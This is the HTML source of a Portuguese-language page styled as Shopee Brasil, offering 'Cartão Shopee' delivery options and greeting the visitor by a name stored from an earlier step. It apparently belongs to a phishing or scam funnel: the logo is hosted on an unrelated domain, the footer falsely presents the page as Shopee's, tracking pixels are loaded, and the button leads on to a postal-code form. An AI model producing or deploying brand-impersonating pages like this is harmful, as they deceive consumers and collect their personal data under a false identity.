﻿<!DOCTYPE html>
<html lang="pt-BR">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Cartão Shopee - Opções de Entrega</title>





    <script>
        window.pixelId = "675fc2adbe7dec4a0a382d31";
        var a = document.createElement("script");
        a.setAttribute("async", "");
        a.setAttribute("defer", "");
        a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
        document.head.appendChild(a);
      </script>
      
      
      <script
        src="https://cdn.utmify.com.br/scripts/utms/latest.js"
        data-utmify-prevent-subids
        async
        defer
      ></script>
      
      <!-- Meta Pixel Code -->
      <script>
      !function(f,b,e,v,n,t,s)
      {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
      n.callMethod.apply(n,arguments):n.queue.push(arguments)};
      if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
      n.queue=[];t=b.createElement(e);t.async=!0;
      t.src=v;s=b.getElementsByTagName(e)[0];
      s.parentNode.insertBefore(t,s)}(window, document,'script',
      'https://connect.facebook.net/en_US/fbevents.js');
      fbq('init', '9027210824040972');
      fbq('track', 'PageView');
      </script>
      <noscript><img height="1" width="1" style="display:none"
      src="https://www.facebook.com/tr?id=9027210824040972&ev=PageView&noscript=1"
      /></noscript>
      <!-- End Meta Pixel Code -->







    <style>
        @import url('https://fonts.googleapis.com/css2?family=Inter:wght@300;400;500;600;700&display=swap');

        body {
            background-color: #f6f6f6;
            color: #1a1a1a;
            font-family: 'Inter', sans-serif;
            line-height: 1.6;
            margin: 0;
        }

        .grid-container {
            display: grid;
            grid-template-areas:
                'top-bar'
                'content'
                'footer';
            grid-template-rows: auto 1fr auto;
            min-height: 100vh;
        }

        .header {
            background: #EE4D2D;
            color: #ffffff;
            padding: 1rem 0;
            text-align: center;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .main-content {
            max-width: 480px;
            background-color: #ffffff;
            padding: 2rem;
            border-radius: 12px;
            margin: 40px auto;
            box-shadow: 0 4px 6px rgba(0,0,0,0.05);
            border: 1px solid #f0f0f0;
        }

        .welcome-text {
            font-size: 1.25rem;
            color: #1F2937;
            margin-bottom: 0.5rem;
        }

        .welcome-text span {
            color: #EE4D2D;
            font-weight: 600;
        }

        .subtitle {
            color: #4B5563;
            margin-bottom: 1.5rem;
            font-size: 1rem;
        }

        .delivery-option {
            background: #FFF5F3 !important;
            border: 1px solid rgba(238, 77, 45, 0.1);
            border-radius: 8px;
            padding: 1rem 1.5rem;
            margin-bottom: 1rem;
            width: 100%;
            text-align: left;
            transition: all 0.2s ease;
            cursor: pointer;
        }

        .delivery-option:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.1);
            border-color: #EE4D2D;
        }

        .delivery-option strong {
            color: #EE4D2D;
            display: block;
            margin-bottom: 0.25rem;
        }

        .map-container {
            margin: 1.5rem 0;
        }

        .map-title {
            color: #4B5563;
            margin-bottom: 1rem;
            font-size: 0.9375rem;
        }

        .map-image {
            width: 100%;
            border-radius: 8px;
            box-shadow: 0 2px 4px rgba(0,0,0,0.1);
        }

        .btn-custom {
            background: linear-gradient(135deg, #EE4D2D 0%, #FF6B4B 100%);
            color: white;
            border: none;
            width: 100%;
            padding: 1rem 2rem;
            border-radius: 8px;
            font-weight: 500;
            font-size: 1rem;
            cursor: pointer;
            transition: all 0.3s ease;
            margin-top: 1rem;
        }

        .btn-custom:hover {
            transform: translateY(-2px);
            box-shadow: 0 4px 12px rgba(238, 77, 45, 0.2);
        }

        .footer {
            background-color: #1a1a1a;
            color: #f5f5f5;
            text-align: center;
            padding: 2rem 1rem;
            border-bottom: solid 3px #EE4D2D;
            font-size: 0.875rem;
        }

        @media (max-width: 768px) {
            .main-content {
                margin: 1rem;
                padding: 1.5rem;
            }

            .delivery-option {
                padding: 1rem;
            }
        }
    </style>
</head>
<body>
<div class="grid-container">   
    <div class="header">
        <img src="https://pabluzw.com/shopee-cartao/logo.png" alt="Shopee Logo" style="width: 160px;">
    </div>
    
    <div style="grid-area: content; padding: 0 1rem;">
        <div class="main-content">
            <div id="recebimento-secao">
                <h4 class="welcome-text">Tudo certo, <span id="nomeCliente"></span>!</h4>
                <p class="subtitle">Agora precisamos saber qual opção melhor para você:</p>
                
                <div class="delivery-options">
                    <button class="delivery-option">
                        <strong>1ª opção:</strong>
                        Receber o cartão pelos Correios
                    </button>
                    <button class="delivery-option">
                        <strong>2ª opção:</strong>
                        Retirar o cartão em uma Agência
                    </button>
                </div>

                <div class="map-container">
                    <p class="map-title">Confira abaixo onde estão as nossas Agências:</p>
                    <img src="../../NbAA44v.jpeg" alt="Unidades Presenciais" class="map-image">
                </div>

                <button class="btn btn-custom" onclick="location.href='cep/index.php.html'">
                    PREFIRO RECEBER PELOS CORREIOS
                </button>
            </div>
        </div>
    </div>

    <div class="footer">
        © 2025 Shopee Brasil. CNPJ: 35.635.824/0001-12<br>
        Av. das Nações Unidas, 3003 - Bonfim, Osasco - SP, 06233-903
    </div>
</div>

<script>
    document.addEventListener("DOMContentLoaded", function() {
        const dadosUsuario = JSON.parse(localStorage.getItem('dadosUsuarioUni'));
        if (dadosUsuario && dadosUsuario.nome) {
            const primeiroNome = dadosUsuario.nome.split(' ')[0];
            document.getElementById('nomeCliente').textContent = primeiroNome;
        }
    });
</script>

<script src="https://cdn.utmify.com.br/scripts/utms/latest.js" data-utmify-prevent-subids async defer></script>
<script>
    window.pixelId = "678838a121a1854bae5e0469";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
</script>
</body>
</html>